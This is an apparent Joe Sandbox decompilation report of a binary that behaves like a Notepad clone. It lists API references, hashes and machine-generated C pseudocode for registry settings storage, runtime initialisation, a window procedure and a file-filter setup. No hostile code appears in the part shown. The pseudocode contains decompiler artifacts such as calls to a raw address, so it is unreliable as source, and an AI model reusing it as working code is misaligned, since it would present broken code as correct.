                                                                                  0x004012e8
                                                                                  0x004012ea
                                                                                  0x004012f0
                                                                                  0x00401301
                                                                                  0x0040130b
                                                                                  0x0040131c
                                                                                  0x0040131e
                                                                                  0x00401324
                                                                                  0x00401335
                                                                                  0x0040133f
                                                                                  0x00401350
                                                                                  0x0040135a
                                                                                  0x0040136b
                                                                                  0x00401375
                                                                                  0x00401386
                                                                                  0x00401390
                                                                                  0x004013a1
                                                                                  0x004013aa
                                                                                  0x004013bc
                                                                                  0x004013be
                                                                                  0x004013c4
                                                                                  0x004013d5
                                                                                  0x004013dd
                                                                                  0x004013ee
                                                                                  0x004013f6
                                                                                  0x00401407
                                                                                  0x0040140f
                                                                                  0x00401420
                                                                                  0x00401428
                                                                                  0x00401439
                                                                                  0x0040143b
                                                                                  0x00401441
                                                                                  0x00401452
                                                                                  0x00401454
                                                                                  0x0040145a
                                                                                  0x0040145f
                                                                                  0x00401471
                                                                                  0x00401482
                                                                                  0x004014a4
                                                                                  0x004014c0
                                                                                  0x004014dc
                                                                                  0x00000000
                                                                                  0x004014e8
                                                                                  0x004014eb

                                                                                  APIs
                                                                                  • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004011EF
                                                                                  • GetWindowPlacement.USER32(?), ref: 00401210
                                                                                  • RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00401242
                                                                                  • RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0040125B
                                                                                  • RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 00401274
                                                                                  • RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00401293
                                                                                  • RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 004012B2
                                                                                  • RegSetValueExW.ADVAPI32(?,lfCharSet,00000000,00000004,?,00000004), ref: 004012CD
                                                                                  • RegSetValueExW.ADVAPI32(?,lfClipPrecision,00000000,00000004,?,00000004), ref: 004012E8
                                                                                  • RegSetValueExW.ADVAPI32(?,lfEscapement,00000000,00000004,?,00000004), ref: 00401301
                                                                                  • RegSetValueExW.ADVAPI32(?,lfItalic,00000000,00000004,?,00000004), ref: 0040131C
                                                                                  • RegSetValueExW.ADVAPI32(?,lfOrientation,00000000,00000004,?,00000004), ref: 00401335
                                                                                  • RegSetValueExW.ADVAPI32(?,lfOutPrecision,00000000,00000004,?,00000004), ref: 00401350
                                                                                  • RegSetValueExW.ADVAPI32(?,lfPitchAndFamily,00000000,00000004,?,00000004), ref: 0040136B
                                                                                  • RegSetValueExW.ADVAPI32(?,lfQuality,00000000,00000004,?,00000004), ref: 00401386
                                                                                  • RegSetValueExW.ADVAPI32(?,lfStrikeOut,00000000,00000004,?,00000004), ref: 004013A1
                                                                                  • RegSetValueExW.ADVAPI32(?,lfUnderline,00000000,00000004,?,00000004), ref: 004013BC
                                                                                  • RegSetValueExW.ADVAPI32(?,lfWeight,00000000,00000004,?,00000004), ref: 004013D5
                                                                                  • RegSetValueExW.ADVAPI32(?,iMarginTop,00000000,00000004,?,00000004), ref: 004013EE
                                                                                  • RegSetValueExW.ADVAPI32(?,iMarginBottom,00000000,00000004,?,00000004), ref: 00401407
                                                                                  • RegSetValueExW.ADVAPI32(?,iMarginLeft,00000000,00000004,?,00000004), ref: 00401420
                                                                                  • RegSetValueExW.ADVAPI32(?,iMarginRight,00000000,00000004,?,00000004), ref: 00401439
                                                                                  • RegSetValueExW.ADVAPI32(?,bStatusBar,00000000,00000004,?,00000004), ref: 00401452
                                                                                    • Part of subcall function 00401051: RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 00401069
                                                                                    • Part of subcall function 00401051: RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,?,?,?), ref: 00401090
                                                                                    • Part of subcall function 00401051: RegCloseKey.ADVAPI32(?), ref: 004010AB
                                                                                  • MulDiv.KERNEL32(00000000,000002D0,00000000), ref: 0040146A
                                                                                  • RegSetValueExW.ADVAPI32(?,iPointSize,00000000,00000004,?,00000004), ref: 00401482
                                                                                  • lstrlenW.KERNEL32(00415F9C), ref: 0040148F
                                                                                  • RegSetValueExW.ADVAPI32(?,lfFaceName,00000000,00000001,00415F9C,00000000), ref: 004014A4
                                                                                  • lstrlenW.KERNEL32(00416CE0), ref: 004014AB
                                                                                  • RegSetValueExW.ADVAPI32(?,szHeader,00000000,00000001,00416CE0,00000000), ref: 004014C0
                                                                                  • lstrlenW.KERNEL32(00416EE8), ref: 004014C7
                                                                                  • RegSetValueExW.ADVAPI32(?,szTrailer,00000000,00000001,00416EE8,00000000), ref: 004014DC
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004014E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$lstrlen$Close$CreateOpenPlacementQueryWindow
                                                                                  • String ID: ,$Software\Microsoft\Notepad$bStatusBar$fWrap$iMarginBottom$iMarginLeft$iMarginRight$iMarginTop$iPointSize$iWindowPosDX$iWindowPosDY$iWindowPosX$iWindowPosY$lfCharSet$lfClipPrecision$lfEscapement$lfFaceName$lfItalic$lfOrientation$lfOutPrecision$lfPitchAndFamily$lfQuality$lfStrikeOut$lfUnderline$lfWeight$szHeader$szTrailer
                                                                                  • API String ID: 3965342766-4088090211
                                                                                  • Opcode ID: c20fdf0be47cd7dd985298f809fffadeaa9cccdaab9f16faed17015c80af1ec7
                                                                                  • Instruction ID: 4b1105d802719206c16219924c3284388b7f1d0651c537867ca8293f0a584477
                                                                                  • Opcode Fuzzy Hash: c20fdf0be47cd7dd985298f809fffadeaa9cccdaab9f16faed17015c80af1ec7
                                                                                  • Instruction Fuzzy Hash: 33A1E8B294021CFEDB01DB95DD85EEFBFBDEB85B44F2040A7B500E2160D6B55E809B68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 62%
                                                                                  			E004073F2(void* __ebx) {
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				_Unknown_base(*)()* _t7;
                                                                                  				long _t10;
                                                                                  				void* _t11;
                                                                                  				int _t12;
                                                                                  				void* _t14;
                                                                                  				void* _t15;
                                                                                  				void* _t16;
                                                                                  				void* _t18;
                                                                                  				intOrPtr _t21;
                                                                                  				long _t26;
                                                                                  				void* _t30;
                                                                                  				struct HINSTANCE__* _t35;
                                                                                  				intOrPtr* _t36;
                                                                                  				void* _t39;
                                                                                  				intOrPtr* _t41;
                                                                                  				void* _t42;
                                                                                  
                                                                                  				_t30 = __ebx;
                                                                                  				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                  				if(_t35 != 0) {
                                                                                  					 *0x415a54 = GetProcAddress(_t35, "FlsAlloc");
                                                                                  					 *0x415a58 = GetProcAddress(_t35, "FlsGetValue");
                                                                                  					 *0x415a5c = GetProcAddress(_t35, "FlsSetValue");
                                                                                  					_t7 = GetProcAddress(_t35, "FlsFree");
                                                                                  					__eflags =  *0x415a54;
                                                                                  					_t39 = TlsSetValue;
                                                                                  					 *0x415a60 = _t7;
                                                                                  					if( *0x415a54 == 0) {
                                                                                  						L6:
                                                                                  						 *0x415a58 = TlsGetValue;
                                                                                  						 *0x415a54 = E00407102;
                                                                                  						 *0x415a5c = _t39;
                                                                                  						 *0x415a60 = TlsFree;
                                                                                  					} else {
                                                                                  						__eflags =  *0x415a58;
                                                                                  						if( *0x415a58 == 0) {
                                                                                  							goto L6;
                                                                                  						} else {
                                                                                  							__eflags =  *0x415a5c;
                                                                                  							if( *0x415a5c == 0) {
                                                                                  								goto L6;
                                                                                  							} else {
                                                                                  								__eflags = _t7;
                                                                                  								if(_t7 == 0) {
                                                                                  									goto L6;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					_t10 = TlsAlloc();
                                                                                  					 *0x414584 = _t10;
                                                                                  					__eflags = _t10 - 0xffffffff;
                                                                                  					if(_t10 == 0xffffffff) {
                                                                                  						L15:
                                                                                  						_t11 = 0;
                                                                                  						__eflags = 0;
                                                                                  					} else {
                                                                                  						_t12 = TlsSetValue(_t10,  *0x415a58);
                                                                                  						__eflags = _t12;
                                                                                  						if(_t12 == 0) {
                                                                                  							goto L15;
                                                                                  						} else {
                                                                                  							E00406741();
                                                                                  							_t41 = __imp__EncodePointer;
                                                                                  							_t14 =  *_t41( *0x415a54);
                                                                                  							 *0x415a54 = _t14;
                                                                                  							_t15 =  *_t41( *0x415a58);
                                                                                  							 *0x415a58 = _t15;
                                                                                  							_t16 =  *_t41( *0x415a5c);
                                                                                  							 *0x415a5c = _t16;
                                                                                  							 *0x415a60 =  *_t41( *0x415a60);
                                                                                  							_t18 = E0040A1DD();
                                                                                  							__eflags = _t18;
                                                                                  							if(_t18 == 0) {
                                                                                  								L14:
                                                                                  								E0040713F();
                                                                                  								goto L15;
                                                                                  							} else {
                                                                                  								_t36 = __imp__DecodePointer;
                                                                                  								_t21 =  *((intOrPtr*)( *_t36()))( *0x415a54, E004072C3);
                                                                                  								 *0x414580 = _t21;
                                                                                  								__eflags = _t21 - 0xffffffff;
                                                                                  								if(_t21 == 0xffffffff) {
                                                                                  									goto L14;
                                                                                  								} else {
                                                                                  									_t42 = E00408C3F(1, 0x214);
                                                                                  									__eflags = _t42;
                                                                                  									if(_t42 == 0) {
                                                                                  										goto L14;
                                                                                  									} else {
                                                                                  										__eflags =  *((intOrPtr*)( *_t36()))( *0x415a5c,  *0x414580, _t42);
                                                                                  										if(__eflags == 0) {
                                                                                  											goto L14;
                                                                                  										} else {
                                                                                  											_push(0);
                                                                                  											_push(_t42);
                                                                                  											E0040717C(_t30, _t36, _t42, __eflags);
                                                                                  											_t26 = GetCurrentThreadId();
                                                                                  											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                  											 *_t42 = _t26;
                                                                                  											_t11 = 1;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					return _t11;
                                                                                  				} else {
                                                                                  					E0040713F();
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}





















                                                                                  0x004073f2
                                                                                  0x00407400
                                                                                  0x00407404
                                                                                  0x00407424
                                                                                  0x00407431
                                                                                  0x0040743e
                                                                                  0x00407443
                                                                                  0x00407445
                                                                                  0x0040744c
                                                                                  0x00407452
                                                                                  0x00407457
                                                                                  0x0040746f
                                                                                  0x00407474
                                                                                  0x0040747e
                                                                                  0x00407488
                                                                                  0x0040748e
                                                                                  0x00407459
                                                                                  0x00407459
                                                                                  0x00407460
                                                                                  0x00000000
                                                                                  0x00407462
                                                                                  0x00407462
                                                                                  0x00407469
                                                                                  0x00000000
                                                                                  0x0040746b
                                                                                  0x0040746b
                                                                                  0x0040746d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040746d
                                                                                  0x00407469
                                                                                  0x00407460
                                                                                  0x00407493
                                                                                  0x00407499
                                                                                  0x0040749e
                                                                                  0x004074a1
                                                                                  0x00407568
                                                                                  0x00407568
                                                                                  0x00407568
                                                                                  0x004074a7
                                                                                  0x004074ae
                                                                                  0x004074b0
                                                                                  0x004074b2
                                                                                  0x00000000
                                                                                  0x004074b8
                                                                                  0x004074b8
                                                                                  0x004074c3
                                                                                  0x004074c9
                                                                                  0x004074d1
                                                                                  0x004074d6
                                                                                  0x004074de
                                                                                  0x004074e3
                                                                                  0x004074eb
                                                                                  0x004074f2
                                                                                  0x004074f7
                                                                                  0x004074fc
                                                                                  0x004074fe
                                                                                  0x00407563
                                                                                  0x00407563
                                                                                  0x00000000
                                                                                  0x00407500
                                                                                  0x00407500
                                                                                  0x00407513
                                                                                  0x00407515
                                                                                  0x0040751a
                                                                                  0x0040751d
                                                                                  0x00000000
                                                                                  0x0040751f
                                                                                  0x0040752b
                                                                                  0x0040752f
                                                                                  0x00407531
                                                                                  0x00000000
                                                                                  0x00407533
                                                                                  0x00407544
                                                                                  0x00407546
                                                                                  0x00000000
                                                                                  0x00407548
                                                                                  0x00407548
                                                                                  0x0040754a
                                                                                  0x0040754b
                                                                                  0x00407552
                                                                                  0x00407558
                                                                                  0x0040755c
                                                                                  0x00407560
                                                                                  0x00407560
                                                                                  0x00407546
                                                                                  0x00407531
                                                                                  0x0040751d
                                                                                  0x004074fe
                                                                                  0x004074b2
                                                                                  0x0040756c
                                                                                  0x00407406
                                                                                  0x00407406
                                                                                  0x0040740e
                                                                                  0x0040740e

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004032DD), ref: 004073FA
                                                                                  • __mtterm.LIBCMT ref: 00407406
                                                                                    • Part of subcall function 0040713F: DecodePointer.KERNEL32(0000000A,00407568,?,004032DD), ref: 00407150
                                                                                    • Part of subcall function 0040713F: TlsFree.KERNEL32(00000025,00407568,?,004032DD), ref: 0040716A
                                                                                    • Part of subcall function 0040713F: DeleteCriticalSection.KERNEL32(00000000,00000000,77D8F3A0,?,00407568,?,004032DD), ref: 0040A244
                                                                                    • Part of subcall function 0040713F: _free.LIBCMT ref: 0040A247
                                                                                    • Part of subcall function 0040713F: DeleteCriticalSection.KERNEL32(00000025,77D8F3A0,?,00407568,?,004032DD), ref: 0040A26E
                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040741C
                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00407429
                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00407436
                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00407443
                                                                                  • TlsAlloc.KERNEL32(?,004032DD), ref: 00407493
                                                                                  • TlsSetValue.KERNEL32(00000000,?,004032DD), ref: 004074AE
                                                                                  • __init_pointers.LIBCMT ref: 004074B8
                                                                                  • EncodePointer.KERNEL32(?,004032DD), ref: 004074C9
                                                                                  • EncodePointer.KERNEL32(?,004032DD), ref: 004074D6
                                                                                  • EncodePointer.KERNEL32(?,004032DD), ref: 004074E3
                                                                                  • EncodePointer.KERNEL32(?,004032DD), ref: 004074F0
                                                                                  • DecodePointer.KERNEL32(004072C3,?,004032DD), ref: 00407511
                                                                                  • __calloc_crt.LIBCMT ref: 00407526
                                                                                  • DecodePointer.KERNEL32(00000000,?,004032DD), ref: 00407540
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00407552
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                  • API String ID: 3698121176-3819984048
                                                                                  • Opcode ID: 5dfacebdbd241fa9c02f50907a1fe7b60bed9190aaf6ba437ccb18094116dc8a
                                                                                  • Instruction ID: abc2b01e53dd726ea6ca3b762da50172eabd6a4d95284a08a9d923f29f314dbe
                                                                                  • Opcode Fuzzy Hash: 5dfacebdbd241fa9c02f50907a1fe7b60bed9190aaf6ba437ccb18094116dc8a
                                                                                  • Instruction Fuzzy Hash: CA315031D94651EAC711AB75FC88ACA3FA5AF847A0B10863BE500A76F0DB789481CB5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 86%
                                                                                  			E0040232A(signed int __edx, struct HWND__* _a4, int _a8, void* _a12, unsigned int _a16) {
                                                                                  				struct tagRECT _v20;
                                                                                  				short _v540;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				signed int _t36;
                                                                                  				signed int _t38;
                                                                                  				long _t40;
                                                                                  				signed int _t41;
                                                                                  				signed int _t43;
                                                                                  				signed int _t50;
                                                                                  				int _t54;
                                                                                  				signed int _t60;
                                                                                  				signed int _t62;
                                                                                  				signed int _t68;
                                                                                  				signed int _t70;
                                                                                  				void* _t82;
                                                                                  				int _t83;
                                                                                  				signed int _t85;
                                                                                  				signed int _t87;
                                                                                  				signed int _t89;
                                                                                  				long _t94;
                                                                                  				void* _t112;
                                                                                  				void* _t113;
                                                                                  
                                                                                  				_t36 =  *0x4151c0 & 0x0000ffff;
                                                                                  				_t83 = _a8;
                                                                                  				_t113 = _t112 - 0x218;
                                                                                  				if(_t83 != _t36) {
                                                                                  					__eflags = _t83 - 0x11;
                                                                                  					if(__eflags > 0) {
                                                                                  						_t38 = _t83 - 0x111;
                                                                                  						__eflags = _t38;
                                                                                  						if(_t38 == 0) {
                                                                                  							E004021A1(_a12 & 0x0000ffff);
                                                                                  							L34:
                                                                                  							_t40 = 0;
                                                                                  							L35:
                                                                                  							return _t40;
                                                                                  						}
                                                                                  						_t41 = _t38 - 6;
                                                                                  						__eflags = _t41;
                                                                                  						if(_t41 == 0) {
                                                                                  							E00401B9F(_a12);
                                                                                  							goto L34;
                                                                                  						}
                                                                                  						_t43 = _t41 - 0x11c;
                                                                                  						__eflags = _t43;
                                                                                  						if(_t43 == 0) {
                                                                                  							DragQueryFileW(_a12, 0,  &_v540, 0x41);
                                                                                  							DragFinish(_a12);
                                                                                  							0x400000( &_v540, 0xffffffff);
                                                                                  							goto L34;
                                                                                  						}
                                                                                  						__eflags = _t43 == 0xd4;
                                                                                  						if(_t43 == 0xd4) {
                                                                                  							goto L34;
                                                                                  						}
                                                                                  						L30:
                                                                                  						_t40 = DefWindowProcW(_a4, _t83, _a12, _a16);
                                                                                  						goto L35;
                                                                                  					}
                                                                                  					if(__eflags == 0) {
                                                                                  						0x400000();
                                                                                  						__eflags = _t36;
                                                                                  						if(_t36 == 0) {
                                                                                  							goto L34;
                                                                                  						}
                                                                                  						_t40 = 1;
                                                                                  						goto L35;
                                                                                  					}
                                                                                  					_t50 = _t83 - 1;
                                                                                  					__eflags = _t50;
                                                                                  					if(_t50 == 0) {
                                                                                  						_t94 = 0x50a00144;
                                                                                  						GetClientRect(_a4,  &_v20);
                                                                                  						__eflags =  *0x415fdc; // 0x0
                                                                                  						if(__eflags == 0) {
                                                                                  							_t94 = 0x50b001c4;
                                                                                  						}
                                                                                  						 *0x415f6c = CreateWindowExW(0x200, L"edit", 0, _t94, 0, 0, _v20.right, _v20.bottom, _a4, 0,  *0x415f60, 0);
                                                                                  						_t54 = CreateFontIndirectW(0x415f80);
                                                                                  						 *0x415f70 = _t54;
                                                                                  						SendMessageW( *0x415f6c, 0x30, _t54, 0);
                                                                                  						SendMessageW( *0x415f6c, 0xc5, 0, 0);
                                                                                  						 *0x415f74 = CreateWindowExW(0, 0x6e, 0, 0x50000000, 0, 0, 0, 0, _a4, 0,  *0x415f60, 0);
                                                                                  						LoadStringW( *0x415f60, 0x206, 0x415f7c, 0);
                                                                                  						 *0x4170f4 =  *0x4170f4 | 0xffffffff;
                                                                                  						 *0x4170f8 =  *0x4170f8 | 0xffffffff;
                                                                                  						E004010B6();
                                                                                  						goto L34;
                                                                                  					}
                                                                                  					_t60 = _t50 - 1;
                                                                                  					__eflags = _t60;
                                                                                  					if(_t60 == 0) {
                                                                                  						E004011CB(__edx);
                                                                                  						PostQuitMessage(0);
                                                                                  						goto L34;
                                                                                  					}
                                                                                  					_t62 = _t60 - 3;
                                                                                  					__eflags = _t62;
                                                                                  					if(_t62 == 0) {
                                                                                  						E00401170(_a16 & 0x0000ffff, _a16 >> 0x10);
                                                                                  						goto L34;
                                                                                  					}
                                                                                  					_t68 = _t62;
                                                                                  					__eflags = _t68;
                                                                                  					if(_t68 == 0) {
                                                                                  						SetFocus( *0x415f6c);
                                                                                  						goto L34;
                                                                                  					}
                                                                                  					_t70 = _t68 - 9;
                                                                                  					__eflags = _t70;
                                                                                  					if(_t70 != 0) {
                                                                                  						goto L30;
                                                                                  					}
                                                                                  					0x400000();
                                                                                  					__eflags = _t70;
                                                                                  					if(_t70 != 0) {
                                                                                  						DestroyWindow(_a4);
                                                                                  					}
                                                                                  					goto L34;
                                                                                  				}
                                                                                  				_t82 = _a16;
                                                                                  				if(( *(_t82 + 0xc) & 0x00000040) != 0) {
                                                                                  					 *0x415f68 =  *0x415f68 & 0x00000000;
                                                                                  				}
                                                                                  				if(( *(_t82 + 0xc) & 0x00000008) != 0) {
                                                                                  					_t89 = 0xa;
                                                                                  					memcpy(0x417124, _t82, _t89 << 2);
                                                                                  					_t113 = _t113 + 0xc;
                                                                                  					E00401C3A(_t82);
                                                                                  				}
                                                                                  				if(( *(_t82 + 0xc) & 0x00000010) != 0) {
                                                                                  					_t87 = 0xa;
                                                                                  					memcpy(0x417124, _t82, _t87 << 2);
                                                                                  					_t113 = _t113 + 0xc;
                                                                                  					E00401D4C(_t82);
                                                                                  				}
                                                                                  				if(( *(_t82 + 0xc) & 0x00000020) != 0) {
                                                                                  					_t85 = 0xa;
                                                                                  					memcpy(0x417124, _t82, _t85 << 2);
                                                                                  					E00401E09(_t82);
                                                                                  				}
                                                                                  				goto L34;
                                                                                  			}


























                                                                                  0x0040232d
                                                                                  0x00402334
                                                                                  0x00402337
                                                                                  0x00402342
                                                                                  0x004023a6
                                                                                  0x004023a9
                                                                                  0x004024fc
                                                                                  0x004024fc
                                                                                  0x00402501
                                                                                  0x00402563
                                                                                  0x00402568
                                                                                  0x00402568
                                                                                  0x0040256a
                                                                                  0x0040256e
                                                                                  0x0040256e
                                                                                  0x00402503
                                                                                  0x00402503
                                                                                  0x00402506
                                                                                  0x00402558
                                                                                  0x00000000
                                                                                  0x00402558
                                                                                  0x00402508
                                                                                  0x00402508
                                                                                  0x0040250d
                                                                                  0x00402536
                                                                                  0x0040253f
                                                                                  0x0040254e
                                                                                  0x00000000
                                                                                  0x0040254e
                                                                                  0x0040250f
                                                                                  0x00402514
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402516
                                                                                  0x00402520
                                                                                  0x00000000
                                                                                  0x00402520
                                                                                  0x004023af
                                                                                  0x004024ec
                                                                                  0x004024f1
                                                                                  0x004024f3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004024f7
                                                                                  0x00000000
                                                                                  0x004024f7
                                                                                  0x004023b7
                                                                                  0x004023b7
                                                                                  0x004023b8
                                                                                  0x0040242a
                                                                                  0x0040242f
                                                                                  0x00402437
                                                                                  0x0040243d
                                                                                  0x0040243f
                                                                                  0x0040243f
                                                                                  0x00402470
                                                                                  0x00402475
                                                                                  0x0040248b
                                                                                  0x00402490
                                                                                  0x0040249f
                                                                                  0x004024cc
                                                                                  0x004024d1
                                                                                  0x004024d7
                                                                                  0x004024de
                                                                                  0x004024e5
                                                                                  0x00000000
                                                                                  0x004024e5
                                                                                  0x004023ba
                                                                                  0x004023ba
                                                                                  0x004023bb
                                                                                  0x00402411
                                                                                  0x00402418
                                                                                  0x00000000
                                                                                  0x00402418
                                                                                  0x004023bd
                                                                                  0x004023bd
                                                                                  0x004023c0
                                                                                  0x00402407
                                                                                  0x00000000
                                                                                  0x00402407
                                                                                  0x004023c3
                                                                                  0x004023c3
                                                                                  0x004023c4
                                                                                  0x004023f0
                                                                                  0x00000000
                                                                                  0x004023f0
                                                                                  0x004023c6
                                                                                  0x004023c6
                                                                                  0x004023c9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004023cf
                                                                                  0x004023d4
                                                                                  0x004023d6
                                                                                  0x004023df
                                                                                  0x004023df
                                                                                  0x00000000
                                                                                  0x004023d6
                                                                                  0x00402344
                                                                                  0x0040234b
                                                                                  0x0040234d
                                                                                  0x0040234d
                                                                                  0x00402358
                                                                                  0x0040235c
                                                                                  0x00402365
                                                                                  0x00402365
                                                                                  0x00402367
                                                                                  0x00402367
                                                                                  0x00402370
                                                                                  0x00402374
                                                                                  0x0040237c
                                                                                  0x0040237c
                                                                                  0x00402380
                                                                                  0x00402380
                                                                                  0x00402389
                                                                                  0x00402391
                                                                                  0x0040239a
                                                                                  0x0040239c
                                                                                  0x0040239c
                                                                                  0x00000000

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: DestroyFocusWindow
                                                                                  • String ID: $qA$$qA$$qA$edit
                                                                                  • API String ID: 3487535441-3532291762
                                                                                  • Opcode ID: 66b6a7f4ab79553599cec14569f15df8e0990a78eb94f5a99c61f67b7d80a9f7
                                                                                  • Instruction ID: 16f5dcc297cbe28d248b0e56e8d7a63b236712e1f54e60767082c5174542b945
                                                                                  • Opcode Fuzzy Hash: 66b6a7f4ab79553599cec14569f15df8e0990a78eb94f5a99c61f67b7d80a9f7
                                                                                  • Instruction Fuzzy Hash: 0B51C131140218BBDB219F75DE4CBEB3E68EB45394F148136FA04A61E1C7BD8941DB6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 80%
                                                                                  			E00401ABC() {
                                                                                  				signed int _t20;
                                                                                  				signed int _t25;
                                                                                  				signed int _t30;
                                                                                  				WCHAR* _t34;
                                                                                  				WCHAR* _t35;
                                                                                  				WCHAR* _t38;
                                                                                  
                                                                                  				LoadStringW( *0x415f60, 0x176, 0x416804, 0xff);
                                                                                  				_t34 = 0x416806 + lstrlenW(0x416804) * 2;
                                                                                  				lstrcpyW(_t34, L"*.txt");
                                                                                  				_t35 = _t34 + 2 + lstrlenW(_t34) * 2;
                                                                                  				LoadStringW( *0x415f60, 0x175, _t35, 0xff);
                                                                                  				_t38 = _t35 + 2 + lstrlenW(_t35) * 2;
                                                                                  				lstrcpyW(_t38, L"*.*");
                                                                                  				 *((short*)(_t38 + 2 + lstrlenW(_t38) * 2)) = 0;
                                                                                  				_t20 =  *0x415fdc; // 0x0
                                                                                  				 *0x41714c =  *0x41714c & 0;
                                                                                  				 *0x417150 =  *0x417150 & 0;
                                                                                  				asm("sbb eax, eax");
                                                                                  				CheckMenuItem(GetMenu( *0x415f64), 0x119,  ~_t20 & 0x00000008);
                                                                                  				_t25 =  *0x415f78; // 0x0
                                                                                  				asm("sbb eax, eax");
                                                                                  				CheckMenuItem(GetMenu( *0x415f64), 0x205,  ~_t25 & 0x00000008);
                                                                                  				_t30 =  *0x415f78; // 0x0
                                                                                  				asm("sbb eax, eax");
                                                                                  				return ShowWindow( *0x415f74,  ~_t30 & 0x00000005);
                                                                                  			}









                                                                                  0x00401adb
                                                                                  0x00401ae6
                                                                                  0x00401af3
                                                                                  0x00401b01
                                                                                  0x00401b11
                                                                                  0x00401b16
                                                                                  0x00401b20
                                                                                  0x00401b31
                                                                                  0x00401b36
                                                                                  0x00401b3b
                                                                                  0x00401b41
                                                                                  0x00401b49
                                                                                  0x00401b63
                                                                                  0x00401b65
                                                                                  0x00401b6c
                                                                                  0x00401b80
                                                                                  0x00401b82
                                                                                  0x00401b89
                                                                                  0x00401b9e

                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000176,00416804,000000FF,00000000), ref: 00401ADB
                                                                                  • lstrlenW.KERNEL32(00416804), ref: 00401AE4
                                                                                  • lstrcpyW.KERNEL32 ref: 00401AF3
                                                                                  • lstrlenW.KERNEL32(80000000), ref: 00401AFA
                                                                                  • LoadStringW.USER32(00000175,?,000000FF), ref: 00401B11
                                                                                  • lstrlenW.KERNEL32(?), ref: 00401B14
                                                                                  • lstrcpyW.KERNEL32 ref: 00401B20
                                                                                  • lstrlenW.KERNEL32(?), ref: 00401B27
                                                                                  • GetMenu.USER32(00000119), ref: 00401B5A
                                                                                  • CheckMenuItem.USER32(00000000), ref: 00401B63
                                                                                  • GetMenu.USER32(00000205), ref: 00401B7D
                                                                                  • CheckMenuItem.USER32(00000000), ref: 00401B80
                                                                                  • ShowWindow.USER32(00000000), ref: 00401B95
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
